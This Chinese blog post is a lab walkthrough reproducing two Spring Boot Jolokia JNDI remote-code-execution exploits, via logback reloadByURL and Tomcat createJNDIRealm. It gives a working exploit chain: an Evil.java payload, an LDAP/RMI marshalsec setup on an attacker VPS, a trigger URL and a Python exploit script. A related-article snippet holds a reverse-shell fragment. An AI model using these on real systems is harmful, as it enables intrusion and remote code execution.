Spring Boot jolokia 配置不当导致RCE漏洞

最新推荐文章于 2024-03-09 15:24:35 发布
最新推荐文章于 2024-03-09 15:24:35 发布
阅读量3.4k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: spring boot java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guo15890025019/article/details/129594714
版权

目录

声明:本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。

漏洞一、jolokia logback JNDI RCE

搭建环境

漏洞环境为:
https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce

IDEA加载源码,并配置一个Spring boot,就可以运行环境了
在这里插入图片描述
环境运行起来后,访问一下/jolokia接口

在这里插入图片描述

利用条件

目标网站存在 /jolokia 或 /actuator/jolokia 接口
目标使用了 jolokia-core 依赖(版本要求暂未知)并且环境中存在相关 MBean
目标可以请求攻击者的 HTTP 服务器(请求可出外网)
普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过

利用方法

1、查看已存在的 MBeans

访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词

在这里插入图片描述
2、准备要执行的 Java 代码

编写用来验证漏洞存在的java代码(Evil.java)

public class Evil{
    public Evil() throws Exception{
        Runtime.getRuntime().exec("calc.exe");
    }
}

使用兼容低版本 jdk 的方式编译:

javac -source 1.5 -target 1.5 Evil.java

然后将生成的 Evil.class 文件拷贝到攻击者VPS上。

3、托管 xml 文件

编写poc.xml文件,放在VPS上和Evil.class文件同一目录下

<configuration>
  <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/aaabbb" as="appName" />
</configuration>

在poc.xml目录下,使用python开启一个简单的http服务

python3 -m http.server 8080

4、架设恶意 ldap 服务

下载 marshalsec(https://github.com/mbechler/marshalsec) ,使用下面命令架设对应的 ldap 服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:8080/#Evil 1389

5、替换实际的 your-vps-ip 地址访问 URL 触发漏洞

/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/poc.xml

结果如下,弹出计算器,说明漏洞利用成功

在这里插入图片描述

在这里插入图片描述

漏洞二:jolokia Realm JNDI RCE

漏洞环境,仍然采用和漏洞一同样的环境。

利用条件

目标网站存在 /jolokia 或 /actuator/jolokia 接口
目标使用了 jolokia-core 依赖(版本要求暂未知)并且环境中存在相关 MBean
目标可以请求攻击者的服务器(请求可出外网)
普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u141/7u131/8u121(RMI),但相关环境可绕过

利用方法

1、查看已存在的 MBeans

访问 /jolokia/list 接口,查看是否存在 type=MBeanFactory 和 createJNDIRealm 关键词。

2、准备要执行的 Java 代码

这一步,和漏洞一方法一样,这里不再赘述。

3、托管 class 文件

在VPS上Evil.class文件目录下,起一个简单http服务

python3 -m http.server 8080

4、架设恶意 rmi 服务

下载 marshalsec (https://github.com/mbechler/marshalsec),使用下面命令架设对应的 rmi 服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:8080/#Evil 1389

5、发送恶意 payload

根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。

#!/usr/bin/env python3
# coding: utf-8
# Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt


import requests



url = 'http://192.168.8.14:9094/jolokia'


create_realm = {
    "mbean": "Tomcat:type=MBeanFactory",
    "type": "EXEC",
    "operation": "createJNDIRealm",
    "arguments": ["Tomcat:type=Engine"]
}

wirte_factory = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "contextFactory",
    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}

write_url = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "connectionURL",
    "value": "rmi://192.168.10.171:1389/Evil"
}

stop = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "stop",
    "arguments": []
}

start = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "start",
    "arguments": []
}

flow = [create_realm, wirte_factory, write_url, stop, start]

for i in flow:
    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))
    r = requests.post(url, json=i)
    r.json()
    print(r.status_code)

VPS上执行 python3 springboot-realm-jndi-rce.py

在这里插入图片描述

目标机器上弹出计算器,漏洞利用成功

在这里插入图片描述

Passer798
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Springboot之actuator配置不当漏洞RCEjolokia
墨痕诉清风的博客
10-25 4423
日穿扫描扫到一个spring boot actuator 可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字 可以使用jolokia-realm-jndi-rce具体步骤如下 先用python3开一个web服务 python3 -m http.server 8080 编译java利用代码 /** * javac -source 1.5 -target 1.5 JNDIObject.java * * Buil..
阿里云java源码-Spring-Boot-Actuator-Exploit:SpringBootActuator(jolokia)XXE/R
06-06
阿里云java源码Spring Boot Actuator (jolokia) XXE/RCE 来自以下文章的信息和有效载荷: 28/02/2020 编辑:另一篇使用 H2 数据库实现 RCE 的文章 在 Spring Boot Actuator < 2.0.0 和 Jolokia 1.6.0 上测试。 如果您可以使用 Spring Boot Actuator 和以下资源访问以下资源/actuator/jolokia或/jolokia : reloadByURL ,这篇文章可以帮助您利用 XXE 并最终利用 RCE。 设置环境: git clone https://github.com/artsploit/actuator-testbed cd actuator-testbed mvn install mvn spring-boot:run 1. jolokia XXE 如果操作reloadByURL存在,则可以从外部 URL 重新加载日志记录配置: logback 背后的 XML 解析器是 SAXParser。 我们可以利用此功能触发基于以下有效负载的 XXE 带外错误: # fil
Spring actuator Jolokia XXE RCE
qq_35533398的博客
10-07 1474
Jolokia XXE/RCE Jolokia允许通过HTTP访问所有已注册的MBean,同时可以使用URL列出所有可用的MBeans操作,访问http://127.0.0.1:8090/jolokia/list即可列出,如下为返回: 格式化后logback Mbean: jolokia在logback JMXConfigurator中提供的“reloadByURL”方法允许从外部URL重新加载日志的记录配置 官网给出了GET和POST两种方式的访问路径以及参数: ..
Jolokia: 功能强大的 Java 远程调试工具
gitblog_00002的博客
03-09 327
Jolokia: 功能强大的 Java 远程调试工具 Jolokia 是一个用于远程调试 Java 应用程序的工具,它允许开发人员通过 HTTP 接口与 JVM 中的 MBean 交互,从而实现对应用程序进行监控、管理和配置。 什么是 JolokiaJolokia 是一个开源的 Java 框架,旨在为 Java 应用程序提供远程调试功能。它可以被集成到任何基于 Java 的应用程序中,并且支持...
实战案例:记一次利用SpringBoot相关RCE-bug拿下某数字化平台系统
hackzkaq的博客
01-17 82
在一次众测项目中,对某大型企业的某套数字化平台系统进行测试,前端功能简单,就一个登录页面,也没有测试账号,由于给的测试时间不多,倒腾了半天没有发现有价值的漏洞,在快要结束的时候,试了几个报错,发现是Spring Boot框架的,仿佛间看到曙光,后续也顺利拿下RCE。通过本文的分享,希望能给大家获取到一些思路和帮助~~访问http://xx.xx.xx.xx/,打开就是一个某数字化平台登录页面,尝试了登录框可能存在的各类漏洞问题,如弱口令,用户名枚举,万能密码登录,登录验证绕过,任意密码重置等等,无果。
Spring Actuator 使用介绍
热门推荐
抱朴守拙
07-26 1万+
文章目录1 Spring Actuator2 Endpoints3 Jolokia4 Health5 Metric 参考资料: Spring Boot 1 Spring Actuator 在生产环境中运行的程序,并不总是稳定、安静、正确的,往往会遇到各式各样的现场状况,这个时候,就需要获取该程序足够多的运行状态信息,然后分析并对其进行有效管理。 Spring Boot Actuator 提供了多种...
Jolokia介绍及使用
yangkei
09-28 1836
Jolokia介绍,使用
jolokia Realm JNDI RCE分析
12-09 2445
jolokia Realm JNDI RCE分析
Jolokia RCE漏洞利用
baidu_38844729的博客
11-30 3008
利用步骤 1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.java public class Exploit { public ExportObject() { try { System.setSecurityManager(null); java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp
Apache ActiveMQ jolokia 远程代码执行漏洞
时光不老的博客
11-29 1993
漏洞存在于Jolokia服务的请求处理方式中,结合ActiveMQ的配置不当Java的高级功能,允许已认证的用户通过发送特定格式的HTTP请求来执行危险操作。ActiveMQ的内部配置允许org.jolokia.http.AgentServlet处理来自/api/jolokia的请求,而没有足够的安全检查来防止恶意操作。
spring-boot-reference.pdf
05-18
Spring Boot Documentation 1. About the Documentation 2. Getting Help 3. First Steps 4. Working with Spring Boot 5. Learning about Spring Boot Features 6. Moving to Production 7. Advanced Topics II. ...
Camelntegration:阿帕奇骆驼Sprint Boot子与jolokia开始
05-14
骆驼整合阿帕奇骆驼Sprint Boot子与jolokia开始如何运行-java -javaagent:jolokia-jvm-1.5.0-agent.jar -jar Integration-api-0.0.1-SNAPSHOT.jar 设置- 在路径中添加jolokia jar文件(从jolokia网站jolokia-jvm-...
jolokia-war-1.6.0.war
03-01
jolokia-war-1.6.0.war 不需要再用JXM监控了 https://jolokia.org/reference/html/index.html
jolokia-war-unsecured-1.6.0
03-01
jolokia-war-1.6.0.war 不需要再用JXM监控了 ,这个是免密的https://jolokia.org/reference/html/index.html
JMX、Jolokia、Telegraf、InfluxDB和Grafana工具的简单组合
最新发布
04-25
Java SSM项目是一种使用Java语言和SSM框架(Spring + Spring MVC + MyBatis)开发的Web应用程序。SSM是一种常用的Java开发框架组合,它结合了Spring框架、Spring MVC框架和MyBatis框架的优点,能够快速构建可靠、...
jolokia-js-client:Jolokia JavaScript 客户端的实现
06-29
Jolokia JavaScript 客户端 用于 Node.js 和浏览器的 Jolokia 服务器的 JavaScript 客户端。 要通过 npm 安装,请运行 npm install jolokia 或者通过凉亭 bower install jolokia 重要如果你在浏览器中使用这个库...
jolokia-jvm-retry:如果绑定失败,则每秒钟重试启动 jolokia-jvm-agent
06-02
jolokia-jvm-重启这个小库是 jolokia-jvm-agent 的包装器。 如果绑定失败,这个库会在每一秒后重试启动 jolokia-jvm-agent。配置有一些系统属性。jolokia-retry.interval 以毫秒为单位的重试间隔。 (默认:1,000 ...
jolokia-dashboard:jolokia 的仪表板应用程序
06-25
Jolokia 仪表板 这是 jolokia 的一个小型仪表板应用程序。 安装 $ sudo yum install ruby $ gem install bundler $ bundle install $ JOLOKIA_CONFIG=/path/to/your/config.rb bundle exec ruby jolokia-dashboard....
11. springboot未授权访问可能导致 ( 2分) 口A. 配置不当而暴露的路由 口B. jolokia配置不当导致rce 口C. 配置不当而暴露的系统用户 口D. 提取内存密码
05-05
A. 配置不当而暴露的路由。Spring Boot 默认会暴露一些常用的路由,如果没有适当的授权限制,攻击者可以通过这些路由直接访问应用程序中的敏感信息或功能。例如,/actuator 端点可以让攻击者获取应用程序的信息,/shutdown 端点可以让攻击者关闭应用程序等。因此,需要适当地配置 Spring Security 或其他授权机制来限制访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值